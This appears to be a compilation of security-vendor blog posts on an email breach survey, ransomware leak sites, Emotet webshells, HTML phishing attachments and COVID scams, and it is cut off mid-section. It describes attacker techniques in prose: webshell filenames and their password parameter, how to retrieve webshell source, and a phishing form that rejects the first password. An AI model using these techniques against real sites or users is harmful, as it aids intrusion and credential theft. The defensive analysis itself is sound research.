1 of every 4 companies suffered at least one email security breach, Hornetsecurity survey finds

1 of every 4 companies suffered at least one email security breach, Hornetsecurity survey finds

Email security is one of the main topics of concern for any IT department, and for good reason. Security breaches often lead to loss of sensitive data, operation downtime, and lost revenue. So we conducted an email security survey of 420+ businesses, and found that 23% of them, or 1 in 4, reported an email-related security breach. Of these security breaches, 36% were caused by phishing attacks targeting arguably the weakest point of any security system, end users.

The survey also examined how companies operating on the Microsoft 365 platform handle email security, and whether or not they use the baked-in Microsoft 365 security tools, or resort to third-party solutions. It is important to keep in mind that the results reveal the number of security breaches that respondents were aware of, and that often potential security breaches are reported months after they occur, missed completely, or not reported at all.
Reported Email Security Breach

What’s the main cause of email security breaches?

Of the security breaches respondents reported knowing about, 36% were caused by phishing attacks specifically targeting end users. More surprising is that 62% of all reported email security breaches occurred due to user-compromised passwords and successful phishing attacks.
User Compromised PW and Phishing Attacks
This fact reconfirms what many already think to be true – that your email security functions are only as useful as the training provided to end users to use said functions correctly and responsibly.

Use of Microsoft 365 Security Features

Keeping this data in mind, we then wanted to quantify and understand what companies are doing to bolster their email security. We asked a series of questions around most of the security features currently built into Microsoft 365. More specifically, we asked whether companies are using them, and if not, why. Here’s what we found:

● 1/3 of companies do not enable Multi-Factor Authentication for all users
● More than half (55%) of those who use MFA do not use Conditional Access
● 69% of respondents do not digitally sign messages
● 58% of respondents do not use encrypted email

Do not enable MFA for users
These issues are also compounded by the fact that 57% of our respondents also mention that they do not leverage Microsoft 365 Data Loss Prevention policies and 23% of these point to a lack of knowledge about the implementation of such policies as the reason.
Leverage DataLoss Prevention Policies

68% of companies expect Microsoft 365 to keep them safe from email threats, yet 50% use third-party solutions

There seems to be a disconnect between the expectations that businesses have of Microsoft 365’s email security, and the reality: While 2 out of every 3 expect Microsoft to keep them safe from email threats, half of all respondents resort to third-party solutions to supplement email security.
MS Keeping Safe from Email Threats
MS Email Security Features Licensing

Third-Party Solutions most effective, with 82% reporting no breaches

Those that use third-party solutions reported the lowest rate of email security breaches in comparison to organizations using security packages offered by Microsoft 365. An impressive 82% of all our respondents who use third-party email security solutions reported no breaches.
82 Percent report no Security Breaches
Additionally, of those who reported paying extra for Microsoft’s Enterprise Mobility & Security E3 or E5, 48% also use third-party solutions. So while expectations of Microsoft 365’s email security are high, the reality is most companies believe it’s not enough; and the numbers back up that claim.

Which companies are the most vulnerable to email security threats?

For context, here is some geographical data about our respondents: the overwhelming majority (63.8%) hail from North America, with Europe trailing at 26.5%. The rest are split between Asia (3.5%), Africa (2.9%), Australia (1.3%), Latin America (1.3%), and the Middle East (0.5%).
74% of all security breaches reported in this survey were by companies that fell within two company size brackets. Those with 201-500 employees and 501-1000 employees. This is likely due to a combination of factors such as budget and recruitment priorities that do not recognize digital security as a major concern at the outset.
Reported Breaches based on Company Size
Once the employee count exceeds 1,000, the incidence of an email breach decreases to 17% – probably due to reactions to previous security concerns and the ability to invest in more robust security protocols and more advanced IT infrastructure. Illustrating this point is the fact that companies with 1,001+ employees are 11% more likely to have MFA enabled for all users than those with 201-500 employees.
Here’s another interesting tidbit: North American respondents reported 5% more email security breaches than their counterparts in Europe. Yet both regions use Multi-Factor Authentication at the same rate: 68%. This could be due to the fact that US breaches tend to yield much higher payouts, so US organizations might be targeted more aggressively.

How do companies feel about storing sensitive data on Exchange Online & Microsoft 365?

MS365 and MS Exchange Security Concerns
The majority of respondents reported no concerns with storing sensitive data, but it results that nearly 4 of every 10 companies do not store sensitive data using the Microsoft 365 platform due to data security concerns. That percentage is not insignificant considering that platforms such as Microsoft 365 are critical to most company operations.

Cyber threats on the rise – additional security layers strongly recommended for Microsoft 365

Microsoft is considered the biggest driver of the cloud movement and Microsoft 365 has brought the world’s most-used office suite to the cloud. Both critical and sensitive files are uploaded and exchanged every day by millions of business customers in the Microsoft suite – and cybercriminals are aware of this. The risks of cyberattacks are increasing every day and more incidents are being reported by both private individuals and companies of all sizes. As the survey shows, it is not only large global operating companies that are affected but also small and medium-sized ones that are increasingly becoming the focus of hackers.

With 365 Total Protection, Hornetsecurity launched a comprehensive Security & Compliance Suite for Microsoft 365, specifically designed for the cloud service and integrates seamlessly. 365 TP is available in two versions: 365 Total Protection Business includes multiple features, such as email and data security, and thus proves to be a reliable additional protection against spam and malware attacks. Advanced features and advanced protection mechanisms are included in 365 Total Protection Enterprise. With AI-based forensic analysis mechanisms, URL malware control, and ATP sandboxing, even the latest targeted cyberattacks, such as ransomware or business email compromise, are blocked.

Furthermore, the service is characterized by its fast, 30-second onboarding process, intuitive operation, and low maintenance requirements.

Click here for more information: https://www.hornetsecurity.com/en/services/365-total-protection/

Leakware-Ransomware-Hybrid Attacks

Leakware-Ransomware-Hybrid Attacks

Summary: Leakware-Ransomware Hybrids

Since December 2019, ransomware operators have been using leakware/ransomware hybrid attacks more and more often. These attacks combine the classic ransomware attack with a leakware attack. In a classic ransomware attack, the victim’s data is encrypted and is only decrypted back after the victim pays a ransom fee to the ransomware operators. In a leakware attack, the data is stolen, and the victim is blackmailed with the data being published publicly unless he pays a certain fee. In a leakware/ransomware hybrid attack, the data is first stolen, then encrypted. Then the victim is first asked to pay the ransom for decryption. If the victim declines to pay the ransom, the attackers threaten him to release the stolen data publicly. In some cases, business partners and/or customers of the victim are also contacted and informed of the impending data release to put even more pressure on the victim.

In this article we outline how these leakware/ransomware hybrid attacks work, how they differ from classic ransomware attacks, and how you can protect yourself against them.


Background: What is Ransomware?

With the rise of crypto currencies, ransomware has become popular for cybercriminals. While ransomware existed before crypto currencies, the logistics of the ransom transfer were greatly simplified by crypto currencies.

According to ID Ransomware, a free service to identify ransomware, there exist 928 different pieces of ransomware1.

Ransomware is often distributed and deployed by other malware. A popular attack vector is email. A typical infection chain of a ransomware attack is the following:

Infection chain of email-based ransomware attack

Actors behind ransomware are financially motivated. Their ransomware encrypts the victim’s data. The attackers will only decrypt the data if the victim pays a ransom.

Ransom demands can range from a few hundred Euro for decrypting a single computer, over several thousand for computers of a small business, up to millions for large corporations and/or government entities. The largest publicly known ransom to ever be paid amounted to $4.5M. It was paid by the U.S. travel management company CWT2.


Classic Ransomware

The interaction and information flow of a classical ransomware case is as follows:

Ransomware interaction flow



New Leakware/Ransomware Hybrid

Since December 2019, actors behind the Maze ransomware operation began combining a previous attack known as leakware with ransomware.

In a leakware attack, data of the victim is stolen, and the attackers threaten to publish the data if the victim does not pay a ransom. Leakware is therefore the opposite to ransomware. Instead of denying the victim access to the data, access to the data is granted to everyone in case the victim does not pay.

This new leakware/ransomware hybrid scheme combines both leakware and ransomware. To this end, before encrypting the victim’s data via ransomware, the data is exfiltrated to the ransomware operators, who then threaten to publish the data if the victim refuses to pay the ransom.

In addition, some ransomware operators will contact the victim’s business partners or customers, whose data is often among the data to be published. The operators behind the Clop ransomware are notorious for doing this. This is used to further increase pressure on the victim to pay the ransom.

The interaction and information flow of the new leakware/ransomware hybrid is as follows:

Ranshameware interaction flow

The problem for the victims is that, even if they pay the ransom, there is no guarantee the leaked data will be deleted – only the promise of criminals. The leaked data could be sold in the underground economy, used in future attacks, and even used to extort the same victim again with the same data at a later point in time.


Clop Ransomware as Example

Using the Clop ransomware as an example, we outline how a leakware/ransomware hybrid attack unfolds.

The Clop ransomware is operated by a threat actor commonly referred to as TA505. Hornetsecurity has reported on these activities previously3. Initial access takes place via a malicious email. TA505 does big-game hunting, i.e., they specifically target large corporations with high revenues. If a recipient opens the email and follows the instructions, which in most cases involve downloading a malicious document and allowing the document to execute macros, the recipient becomes a victim. The macro code in the document then downloads a remote administration trojan (RAT). This RAT gives the attackers remote access to the victim’s computer. The RAT is then used to move laterally within the victim’s company network and gather additional information. In addition, other tools (such as those from the Cobalt Strike framework) are often deployed to obtain domain admin rights. Valuable data is then exfiltrated. From victim data which was published in the past, we know that this data usually contains the complete shared drives of the infected company. Eventually, the Clop ransomware is deployed company-wide to encrypt and incapacitate as many systems as possible so the disruption to the company is maximized.

Then, the operators of the Clop ransomware send the victim to a ransom note website hosted via a Tor hidden service. This ransom note website includes details on the ransom and how to pay it.

Clop Decryptor website

Depending on the company size and estimated revenue, the demanded ransom is often in the millions. Again, TA505 does big-game hunting, i.e., they will only target large corporations with high revenues. The ransom note website also features a timer and a threat that if the ransom is not paid in time, the price will be doubled.

To proof to the victim that files can be decrypted, the ransom note site also offers a “Trial Decryption”.

Clop Decryptor Website's Trial Decryption

The ransom note site also features a support chat. Those chats are often used to negotiate the ransom, payment rates or deadline extensions.

Clop Decryptor website's Chat support

If a victim refuses to pay or does not enter negotiations, the ransomware operators start sending out mass-email notifications to the victim’s business partners and/or customers. Here is one example of such a notification email sent out by the Clop ransomware operators:

Clop notification email

The attached list.txt file contains a list of the Windows domains and their corresponding network shares from which the Clop ransomware operators have exfiltrated data. The links in the notification email point to the subpage on the Clop’s leak site where the stolen data is shared.

The Clop ransomware leak site is titled “CL0P^_- LEAKS”. It currently lists 13 victims. Here is an example of a leaked data view:

Clop leak site



List of Leak Sites

Currently, there exist leak sites for 13 different ransomware operations. The distribution of victims among each leak site can be seen in the following plot:

Victim distribution on ransomware leak sites




With 220 victims, the leak site of the Maze ransomware is the one with highest number of victims. Apparently, the operators behind the Maze ransomware have so many potential victims that they have formed the so-called Maze Cartel, in which the help other ransomware operations for a share of the profits.

Maze leak site

Interestingly, the Maze leak site is among the leak sites that are also acessible via the clear web and not just via a hidden service.


REvil / Sodinokibi

The second most dominant ransomware with a leak site is REvil. Their site, called “Happy Blog”, contains data from 67 victims.

REvil leak site

In June 2020, the actors behind the REvil ransomware also started to “auction” stolen data:

REvil auction

However, the auction site doesn’t contain any information on how to bid. It is likely just another mechanism to gain media attention and scare companies into paying the attackers.



With data from 59 victims, the “Doppel leaks” leak site of the DoppelPaymer ransomware comes in on third place.

DoppelPaymer leak site

The site is also accessible via a clear web domain.



The “Conti News” leak site of the new Conti ransomware already has data from 43 victims. From all current available information, the Conti ransomware seems to be the successor to the notorious Ryuk ransomware.

Conti leak site

Conti leak site

The site is also accessible via a clear web domain.

After Maze, Conti is currently the ransomware with the fastest growing victim count, sometimes increasing in up to 10 new victims per day. Here, it is worth noticing that only victims who refuse to pay the ransom are published on the leak sites.



Data from 37 victims of the NetWalker ransomware has been published on their leak site titled “NetWalker Blog”.

NetWalker leak site



Mespinoza / Pysa

The Mespinoza ransomware, also known as Pysa, has titled their leak site “Pysa’s Partners”. It features data from 28 victims.

Mespinoza leak site




The leak site of the Nephilim ransomware, called “Corporate Leaks”, contains data from 16 victims.

Nephilim leak site




The leak site of the RagnarLocker ransomware is titled “RAGNAR LEAKS NEWS”. It features data from 14 victims.

RagnarLocker leak site



The leak site of the SunCrypt ransomware is simply titled “News”. However, researchers were able to contact the operators of the site and confirm that the leak site is associated with the SunCrypt ransomware. The leak site features data from 9 victims.

SunCrypt leak site




The Sekhmet ransomware leak site, titled “Sekhmet Leaks.” is only available via a clear web address. It currently features data from 8 victims.

Sekhmet leak site




In the first Avaddon campaign observed by Hornetsecurity4, no data was exfiltrated. The campaign distributed Avaddon via the Phorpiex botnet, and the encryption of the victims was fully automated. The campaign was hence not targeted at high-value victims for which a leak would be worthwhile. However, Avaddon has since been used in different campaigns and their leak site, titled “Avaddon Info”, has currently data from 4 victims.

Avaddon leak site



A very recent leak site is the “Darkside” leak site of the Darkside ransomware. It has data from 2 victims.


MedusaLocker / AKO

The MedusaLocker ransomware also had a leak site, which at one point featured data from 7 victims.

MedusaLocker leak site

However, currently the site only contains a “coming soon” message without any published contents of victims. It seems the site is currently being restructured.



The Nemty ransomware also used to have a leak site. The site was also reachable via a clear web domain. However, the site is currently not reachable anymore.



Hornetsecurity previously has analyzed the ProLock ransomware, which also claims to “have gathered […] sensitive data” and “would share it in case [the victims] refuse to pay”5. However, no ProLock leak site has appeared yet.


Conclusion and Remediation

The new leakware/ransomware hybrid attacks make malware infections more dangerous to businesses than ever before. While good backups helped against classic ransomware attacks, they do not provide any protection against private and/or confidential data being forcefully leaked to the public. The broad announcement of the data leak to business partners and customers will cause further damages and loss of reputation to victims as business partners and customers, but also competitors get unlimited access to internal documents, such as contracts, pricing, research and development findings, etc.

In general, the only protection against these leakware/ransomware hybrid attacks is to invest in effective IT security. With regards to email, Hornetsecurity’s Spam and Malware Protection and Hornetsecurity’s Advanced Threat Protection protect against leakware/ransomware hybrid attacks using email as their initial infection vector in the same way they protect against classic ransomware attacks using this access vector: by fending off these attacks at the very beginning of the attack chain before the attackers can even obtain initial access to your systems.




The Hornetsecurity Security Lab publishes new figures: about 70% of all emails are unwanted

The Hornetsecurity Security Lab publishes new figures: about 70% of all emails are unwanted

Around 300 billion e-mails are sent every day – the number of e-mails sent and received for private and business purposes is forecast to rise to 361.6 billion by 2024. However, not all e-mails that end up in users’ inboxes are wanted, and unwanted e-mails not only contain questionable advertising, but often also harmful attachments and links.

The experts of the Hornetsecurity Security Labs have analyzed how many e-mails are actually wanted by users and what dangers can lurk in their inboxes based on the e-mails received in the system for the year 2020 and have come to interesting results: Only 28% of the e-mails could be classified as “clean”, i.e. harmless by the Hornetsecurity filters – thus more than 70% of all addressed e-mails were unwanted by the recipient.

Which emails are already blocked in advance?

A total of 67% of incoming e-mails are blocked in advance by Hornetsecurity’s filter mechanisms: this means that these e-mails have not even been classified as harmful or unwanted due to various factors. In June 2020, the Security Lab analyzed the reasons for blocking incoming emails. Below we take a look at the most important ones. 

In first place with almost 58%, are e-mails that could be classified as spam in advance using a real-time blackhole list.

In second place with 12%, are emails that try to use Hornetsecurity’s mail servers as open relay. Open relay is the process by which an email server delivers emails for which it is not responsible. For example, if example.com has an email server, it should only accept email for mustermann@example.com. An open relay server would also accept mail for other domains, such as @test.com. These open relays are often misused to send spam with fake sender addresses.

In 5.9% of the e-mails blocked by Hornetsecurity, no correct sender address could be found. This is important because cyber criminals try to hide their identity or pretend to be someone else. For example: In the case of mustermann@example.com, if the domain example.com does not exist, the email is blocked.

In 5.3% of blocked e-mails, harmful content was found. Malicious content includes attachments such as *.xls, *.doc, *.pdf that contain malware, but also links that lead to malicious or compromised web pages.

What threats are found in the emails that were not blocked in advance?

The proportion of spam, malware and other threats in the non-blocked emails is also interesting. For this evaluation, the security experts checked the total number of incoming emails minus the blocked emails.

About 10% of these analyzed e-mails were spam and about 3% were info mails. The Security Lab experts were also able to find malware in about 1% of all incoming e-mails, and just under 0.1% were even detected by Hornetsecury’s Advanced Threat Protection. These are attacks such as CEO fraud, spearphishing, or attacks that use new types of malware, which were only detected by the Hornetsecurity ATP Sandbox and not by classic filters. Conversely, this means that more than 10% of the e-mails that are not blocked in advance contain spam or attachments and content that are harmful to the user.

Although the majority of harmful e-mails can be blocked, companies should not yet sit back and relax. Cybercriminals are constantly finding new ways to send malicious emails to users and their attacks are still often successful.

The webshells powering Emotet

The webshells powering Emotet


The Hornetsecurity Security Lab presents details on the webshells behind the Emotet distribution operation, including insights into payload downloads and how from 2020-07-22 to 2020-07-24 Emotet payloads on Emotet download URLs were replaced with HTML code displaying GIFs. The analysis shows that the number of downloads of the malicious content behind the Emotet download URLs is significant and has been observed peaking at 50,000 downloads per hour. Highlighting that Emotet emails do get clicked. The analysis further shows that compromised websites are not just compromised once but multiple times by different actors and cleanup efforts by the website administrators are often insufficient leading to re-enabling of the malicious Emotet downloads.


Emotet is one of the most prolific malspam actors. They distribute their malware via malspam emails with either a malicious document attachment containing VBA macros or download links to those malicious documents. These malicious documents will then download the Emotet loader from the Emotet download URLs. These downloads are hosted on compromised websites. To this end, the actors behind Emotet use webshell malware on the compromised websites. These webshells are used to place new payloads, either malicious documents distributed via malicious links in emails, or the Emotet loader, on the compromised websites. Because compromised websites get blacklisted or the Emotet malware gets cleaned the actors use up around 300 to 400 URLs a day.

Technical Analysis

In this analysis we take a look at the Emotet webshells.

S.A.P. webshell

If you have access to the filesystem of a website compromised by Emotet getting the webshell used by Emotet is very simple. However, with a bit of luck, relying on misconfigurations in the compromised websites, and relying on another actor in the webshell realm, everyone Emotet webshell samples can be obtained without access to the compromised webservers.

First, the Emotet webshells reside in the directory one level below the directory containing the Emotet download, i.e., either an Emotet maldoc, or the Emotet loader executable download. So if the Emotet download URL is https://www.example.com/wp-includes/LYnUiE/, the webshell will usually reside in https://www.example.com/wp-includes/. However, we also have seen webshells in other directories. Next, we can hope for misconfigurations in the compromised websites and hope the directory containing the webshell is an open directory, i.e., it will list the directory contents as in the following example:

Emotet open directory

In this example, import.php is the Emotet webshell and lpyc42 is the directory that will deliver the Emotet payload. Known filenames of Emotet webshells are user.php, common.php, import.php, update.php, link.php, license.php, menu.php, image.php, options.php, tools.php, core.php, edit.php, functions.php, config.php, and wp-list.php.

Obviously, access to the webshell is protected, i.e., when requesting the import.php file, the PHP code is executed by the webserver and only its output is served. However, on some servers we observed PHP files that had been renamed by adding an additional .suspected extension to the file.

Emotet open directory with renamed webshell (just ignore all the other webshells in that directory :D)

This renaming was actually most likely done by a different malware named Vigilante Malware Cleaner. Information about Vigilante Malware Cleaner was first discovered and documented by Bruce Ediger in 2019 [VigilanteMalwareCleaner]. Existence of this renaming dates back to at least 2015. The Vigilante Malware Cleaner malware seems to compromise already compromised websites, then searches existing PHP files for suspected malware, and disabling suspected malicious PHP scripts by appending .suspected to their filenames and thus excluding the files from the list of files the server will execute as PHP code. This will cause the server to serve the file contents, i.e., the PHP source code of the webshell, directly instead. Using this we can download the PHP code of the Emotet webshell. Before being able to access the webshell the code queries a parameter f_pp, which is used to decode the webshell:

Encoded Emotet webshell

This f_pp parameter functions as a password to the webshell. Via OSINT research we found that the encoded webshell is identical to one found and decoded by another researcher in January [EmotetWebshellSamples].

To illustrate to the reader what someone logging into the this webshell with the correct f_pp parameter would see, we ran the decoded PHP code on a test system:

Emotet S.A.P. v.2.1 webshell

The webshell identifies itself as S.A.P. webshell with version v.2.1. The webshell allows an attacker to search, upload, and download files. It allows to execute arbitrary commands. It further offers convenient tools to dump SQL databases from the server, perform network scans, and/or brute force passwords.

The fact that the decoding processes relies on the f_pp parameter as password and we found multiple instances of the identical encoded webshell code dating back to January strongly suggests that Emotet reuses passwords for their webshells.

GIF hijacking

Even though we do not have logs or other forensic artifacts of the systems in question, we, based on our previous outlined findings, agree with the opinion stated by other researchers that the recent incident in which Emotet downloads were replaced with HTML code displaying GIFs is a result of insufficient security of the Emotet webshells. This hypothesis is supported by the fact that Emotet seems to have changed their webshell on 2020-07-27 and the GIF hijacks stopped. But indications of new GIF hijackings emerged on 2020-07-31. This could be the time it took the GIF replacement actor to figure out the new password. However, new GIF hijackings are not wide spread, which could indicate whatever Emotet is doing to defend itself against the GIF hijackings is working. The used GIFs can be interpreted as a statement towards the actors behind Emotet that the actors behind the GIF replacements are still watching and determined to continue the disruption of the Emotet operation:

Emotet is being watched GIF Emotet is being watched GIF

On later Emotet compromised websites we also multiple times found variations of the following webshell:

Possible new Emotet webshell

We are, however, not certain this is the new Emotet webshell, but would like to point out that the webshell realm is a very crowded space, e.g. we observed one webserver that had two GIF hijackings, two (presumably) by Vigilante Malware Cleaner to .suspected renamed webshells, as well as, as a new active Emotet download – in just one directory (other parts of the server contained even more webshells):

Emotet opendir with 2 GIF hijackings

This means the website was not once, or twice, but at least three times used as a download for Emotet (2020-07-23 and 2020-07-28). The website would likely still server Emotet payloads but luckily its bandwidth limit was exceeded.

Emotet download stopped working due to exceeded bandwidth limit

So there is a possibility that the actors placing the GIFs are gaining access via a vulnerability of the website itself, or are even affiliated with the Vigilante Malware Cleaner malware. But we are a email security provider and hence do not have enough visibility into the website compromise landscape to make any definit statements.

Download statistics

Talking about download quotas, there is a way to externally monitor Emotet payload download statistics. Emotet uses a PHP script to collect download statistics grouped by operating systems given in the downloader’s User-Agent string. These statistics are delivered as an JSON object in a subdirectory of the Emotet payload download directory named as $path , '/.' . sha1(basename($path)):

Emotet download stats

So the statistics for https://www.example.com/wp-includes/LYnUiE/ could be queried from https://www.example.com/wp-includes/LYnUiE/.a2dd7d055bb668528c29e16f789755fb3aae277b.

Going again by previously shared Emotet webshell code [EmotetWebshellSamples] the numbers correspond to Windows (4), Linux (3), Apple (2), Android (1) and unknown (0) operating systems found in the downloader’s User-Agent string:

Emotet statistic PHP code

We proceeded to scrape these statistics. The counters are reset every time the Emotet Tier 2 servers push updated maldocs and loader executables to the compromised websites via the webshells. Hence, when a new count was higher than a previous count, we took the difference as the number of downloads happening between scrapes. But in case the count is lower then a previous count, we assume the count was reset and take the new count as number of downloads since our last scrape. This way we also nullify stuck download statistics, i.e., download statistics that do not get reset anymore. We scraped with a frequency of 1 minute. Emotet updated the documents with a frequency of around 10 minutes. Because Emotet targets the Windows operating system we only consider the download statistics for the Windows operating system. For 12 hours of 2020-07-29 the obtained statistics of 739 Emotet download URLs (533 of which registered active downloads in the presented time frame) can be visualized as follows:

Emotet downloads on 2020-07-29

This is a stacked plot, i.e., each URLs download number is plotted individually but their total shows the cumulative number of all download URLs. Each different color represents a different Emotet download URL. These figures obviously include downloads by security researchers and automated security systems such as sandboxes. We also miss any downloads that happen between one of our scraping runs and Emotet resetting the download counter. However, the figures still give an interesting insight into Emotet downloads and hence the click rate of Emotet. In our observation the cumulative number of Emotet downloads peaked at 50,000 downloads per hour.

Separating the download URLs by their served payloads (based on MIME type analysis) we can see that most downloads are for the Emotet maldoc. The Emotet loader is downloaded far less often:

Emotet downloads on 2020-07-29

If we plot the download numbers according to time after the URL was first observed we see that each URL’s download numbers peak within the first hour the URL was first observed. At that time each observed Emotet URL got around 200 downloads per hour. However, URLs keep getting downloads even 12 hours after the URL was first observed. Hence, every download URL blocked or taken down is potentially one Emotet victim less, even if the blocking or take down happens 12 hours too late.

The following line plot illustrates individual URL download performance:

Emotet downloads aligned by time URL was first observed

Stacking download figures for URLs the falloff trend can clearly be observed. After 9 hours the number of downloads drops to 1/3 of the downloads observed right after the URL was newly observed:

Emotet downloads aligned by time URL was first observed as stacked plot

We think a proportion of the initial peak can be attributed to automated security systems scanning the Emotet malspam and thus downloading the Emotet maldocs from the Emotet download URLs. This is confirmed by again separating the data in URLs serving the Emotet maldocs and URLs serving the Emotet loader:

Emotet downloads aligned by time URL was first observed

The number of downloads of the Emotet loader has a slower rise to the peak then the downloads of the Emotet maldoc, supporting our hypothesis. Further, there is no steep falloff in Emotet loader downloads.

On average the Emotet loader was downloaded at a rate of around 1500 per hour, while the Emotet maldocs were downloaded at a rate of around 7500 per hour.

Failed cleanup attempts

During monitoring the Emotet download URLs more closely we also witnessed failed cleanup attempts multiple times. Often site administrators delete the directory containing the Emotet download. However, they miss cleaning all the webshells. The actors behind Emotet then simply regenerate the deleted files with their next payload update. We also observed Emotet using a previous compromised website again.

Other observed mistakes

Being such a large operation it is inevitable that the actors behind Emotet make mistakes. While allowing another actor to hijack their payload downloads is one mistake, other mistakes include (but are not limited to) messing up the replacement regular expression, so we could observe download URLs delivering Emotet maldocs with broken filenames, such as InvJP0732{:REGEX:.doc, INVOICE-Q84{:REGEX:.doc, invoice-UBO7631{:REGEX:.doc, etc. We are certain the {:REGEX: part should be {:REGEX:[0-9]{3,6} (or something like that), a special syntax used by the Emotet generation processes to expand the filename base on a random but character restrained pattern. These {:REGEX:[...] patterns have also previously leaked in attachment filenames and are part of Emotets automation process. Please note that depending on your Browser the : in the filenames may be replaced with _ because : is not a valid character on the Windows operating system. Monitoring the Emotet operation very closely reveals a lot of such mistakes overtime and the insights gained can be used to strengthen our own defenses against Emotet.

Conclusion and Countermeasure

As this analysis by the Hornetsecurity Security Lab shows Emotet is not just sent in large volume but its malicious content is also downloaded in significant large numbers.

On the network you should block known Emotet URLs. In case browsing to random websites is not an activity necessary to fulfill your business, you can block the domains and not just the specific URLs. This provides better protection because, as has been shown, Emotet and potentially other actors can misuse the compromised website again, either by regaining access via left behind webshells, or by reinfecting the website via the initial access vector, e.g., a WordPress vulnerability or weak password. The block should be kept even if the Emotet download is gone, as the site may still be compromised. It is highly likely that you will never actually need to visit any of these websites at all, thus keeping the websites blocked shouldn’t cause negativ effects.

Hornetsecurity’s Spam and Malware Protection, with the highest detection rates on the market, already detects and blocks Emotet emails based on known indicators. Hornetsecurity’s Advanced Threat Protection extends this protection by also detecting yet unknown threats.



HTML Phishing Asking for the Password Twice

HTML Phishing Asking for the Password Twice

Nothing but the same old threat? Phishing campaigns always seem to proceed by the same principle: A link or attachment placed in an email redirects to a phishing website to retrieve specific data about the recipient. However, for some users, a certain process has now become established that is designed to expose the traditional phishing tactics. Now the Hornetsecurity Security Lab has discovered a phishing scheme that is designed to circumvent this method.


The Procedure

In case of the detected phishing scheme, the entire phishing website is sent to the victim as an HTML attachment and then executed locally in the browser.
While investigating such phishing activity, the Security Lab discovered an interesting tactic in one of the phishing web forms used. In one form, the first password entered by the user is always rejected as incorrect and only the second password is accepted.

This is likely to workaround a methode that some users came up with to protect against phishing. Some users believe that phishing websites will always accept any password. Hence, you can spot a phishing website by entering a wrong password. A phishing website will accept the wrong password, while the legitimate site will reject it as incorrect. This assumption is, however, wrong and the Security Lab will outline why in this article.



Phishing via sending victims the entire HTML source of the phishing webpage as an email attachment is nothing new [1]. The general outline is that the victim receives an email with an attached HTML document.
Here we can see a recent example of such a phishing attempt against a bank:



In the email the user is told that the user profile must be updated otherwise the services of the bank can not be used anymore.

When the user opens the attachment, a form asks for the users credentials or in this case a whole array of private and confidential information:



The document is even so helpful and checks (locally via HTML5 features) whether the information the user has entered has a valid format, e.g., the email contains an @ symbol, etc.:



Once the user’s input was locally validated, a HTTP POST request is issued sending the entered information to a remote server:



This scheme is a great way to prevent your phishing website from being blacklisted, as there is no visible phishing webpage online that a hosting provider could take down. Getting a website banned because it receives HTTP POST requests is a hard one to convey to a hosting provider or owner of a compromised website.

Recently the Security Lab found an interesting new twist to this scheme in a long running scheme of such HTML phishing attachments pretending to be from one the major integrated container logistics and supply chain companies.



The phishing activity the interesting scheme is part of is going on uninterrupted for month – and in a different form likely for years:




The fact that more emails are send during business days would indicate that this activity is targeting businesses:



Even though the langauge of the phishing emails is exclusively English, the emails are send predominantly to German, US and UK companies:



Granted the country distribution is slightly biased by Hornetsecurity’s client base since Hornetsecurity is a market leader in the DACH region.

As an interesting note, the networks from which these emails are send from are as follows:



With the owners of the 7 AS with the highest volume of send emails being:

Volume ASN ASN owner
5450 199653 ARUBAFR-AS, FR
3300 266772 TRIMOTION S.R.L., AR
1450 8374 PLUSNET Plus network operator in Poland, PL
1375 15704 XTRA TELECOM S.A., ES
1275 54290 HOSTWINDS, US
1225 1221 ASN-TELSTRA Telstra Corporation Ltd, AU


Asking the user twice

While most of the observed phishing documents follow the scheme previously outlined – except for asking the user only for a password and having the user’s email address already pre-filled in the document – a few other phishing documents in this series, however, come with a twist.

When opening the phishing document the user is asked to input the password to preview some shipping documents:



Irregardless of what password is entered, the user is immediately presented with another password popup form claiming that the password that was entered is incorrect:



This is probably done in an attempt to prevent clever users from first trying with a made up password – in case it is phishing – and only entering their
real password when a fake password won’t get them in.

But only that last entered password is send to the remote server:



Last but not least, the user is redirected to the image hosting service Imgur and presented with an image of shipping documents:



Obviously, those pictured documents are as fake as the phishing email itself.


Conclusion and Remediation

This example shows that the trick proposed by some users to protect against phishing by always entering a false password first and only after that password was rejected enter the correct password, does not work. The logic behind this trick seems to be that most phishing forms will accept any password. So if a system rejects a wrong password it must be legit, how else would it know that the password is wrong. But as this case has shown a phishing form can simply reject your password, too. In fact it could reject all passwords and send all attempts to the attacker in hopes that the victim will hand over all passwords while trying to log into the fake password form.

Remediation is not so simply. Because the phishing webpage is loaded locally into the victims browser, blacklists such as Googles Safebrowsing will not warn the user that a phishing webpage is opened. Another thing is the exfiltration mechanism. The single HTTP POST request is send to a likely compromised WordPress website, making it hard to discover in a busy network and because there is no visible phishing website online also hard to investigate by a network analyst.

The safest way to protect against these HTML phishing webpage attachments is to not allow them into the users mailbox in the fist place. For example, the precise analysis mechanisms of Hornetsecuritys Spam and Malware Protection detect such emails in the first filter instances and block these phishing emails before they can be delivered to a mailbox.



Corona Opportunists: How bad actors leverage the crisis

Corona Opportunists: How bad actors leverage the crisis

In times of crisis there are always opportunists who try to take advantage of the situation. This is no different with the current Coronavirus COVID19 pandemic, as the experts from Hornetsecurity can observe more and more campaigns developing quite often. Currently, the percentage of malicious emails containing links to Corona is skyrocketing.

In the following, we will therefore describe how the current crisis situation is increasingly serving hackers as a hook for fraudulent attempts, as well as for the spread of spam and malware.



Compared to the total amount of emails classified as malicious by Hornetsecurity, the amount of emails with the topic Coronavirus is still small, but increasing.

To give readers an insight into how cyber-criminals are exploiting the Coronavirus COVID19 crisis with various activities, the Security Lab would like to present some of their daily observations.



We will take a look at three activities:

– Scams
– Spam
– Malware


Sextortion Blackmailers Pivot to COVID19 Scams

First, we look at scams. A long running evergreen is the sextortion scam. In these sextortion scams, a victim receives an email claiming their computer has been compromised and a video was recorded while they were browsing a pornographic website. In order to prevent this video from being shared with the victim’s friends and family the victim should transfer the cryptocurrency (usually Bitcoin) to a specific Bitcoin Address.
Obviously, the victim’s computer has not been compromised and no video was taken.

One activity group that the Security Lab has previously observed being involved in such sextortion scams,
has pivoted to impersonating the WHO and asking the victims for donations because of the coronavirus.

These scam emails can be seen below:



Another such activity has recent straight up started asking for Bitcoins simply for being infected and staying at home and thus protecting the victim’s home by not spreading the virus:



In the following timeline the increase in activity can be seen – the WHO scam uses the Bitcoin Addresses 16gmYrbqMr4SZeA7SqNVmirhnhDG3maYPK and 13Rfk6FXkqswaYnqMys5BkiDvJbwVdL8TD (colors blue and red) while the scam straight up asking for BTC uses 18P3S6DuNUpW2WLozsrrW6rRd6xh24Rc7N (colored in green):



Other activity groups, however, have not yet jumped onto the coronavirus bandwagon. Hence why the classic sextortion scams are also still in use.


Spam for N95/FFP3 Masks

